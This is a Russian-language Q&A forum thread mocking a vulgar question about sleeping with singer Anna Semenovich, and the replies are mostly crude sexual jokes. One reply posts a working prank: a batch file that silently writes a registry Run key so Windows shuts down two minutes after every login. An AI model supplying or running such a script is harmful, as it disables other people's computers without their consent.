Ирина Козлова

Что делать если трахнул Анну Семенович?

Екатерина Качалова

Вовочка!
Она же не дура-за совращение детей ей светит реальный срок, так что ты со своей больной фантазией лишь огорчаешь бабушку.. .
Перестань писаться в штаны, глупо фантазировать и расстраивать маму.
Пей на ночь кефир, садись на горшок, слушай сказку, ложись спать и больше не подсматривай в щёлку чем папка по ночам занимается с мамкой, а то в следующий раз присниться, что тебя трахает Шварценеггер.

Варвара Павленко

обязан на ней жениться.

Татуша Татуша

ты все уже сделал-)

Слава Юркин

ложись спать

Ульяна Беляева

Протрезветь, упоротый.))

Елена Пушкина

Вернись на землю, здесь тоже люди живут. Не летай, а то падать больно.

Олеся

а тебя грудью не придовило

Роман Коваленко

сфотайся с ней, а то пацаны не поверят...

Вар Хай

Тебе все равно никто не поверит!

Дмитрий Ртищев

Готовь место на погосте. Мужика на мотороллере она уже за,,,, хала!

Maria Shapor

Переключайся на ее подруг!

Д*
Дельт@план ***********

Лечится от триппера.

Алёна Ручкина

Срочно проверяться, не заразился ли силикозом

Наталья Литвиненко

Roman

файл Start.bat
regedit /s 000.dat

файл 000.dat
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"VZLOMAN"="shutdown.exe -s -t 130 -c \"ДОИГРАЛСЯ? ТЕПЕРЬ ТЫ ВЛИП! ЧЕРЕЗ 2 МИНУТЫ ОТБОЙ)) "

и что ты типа умный да ???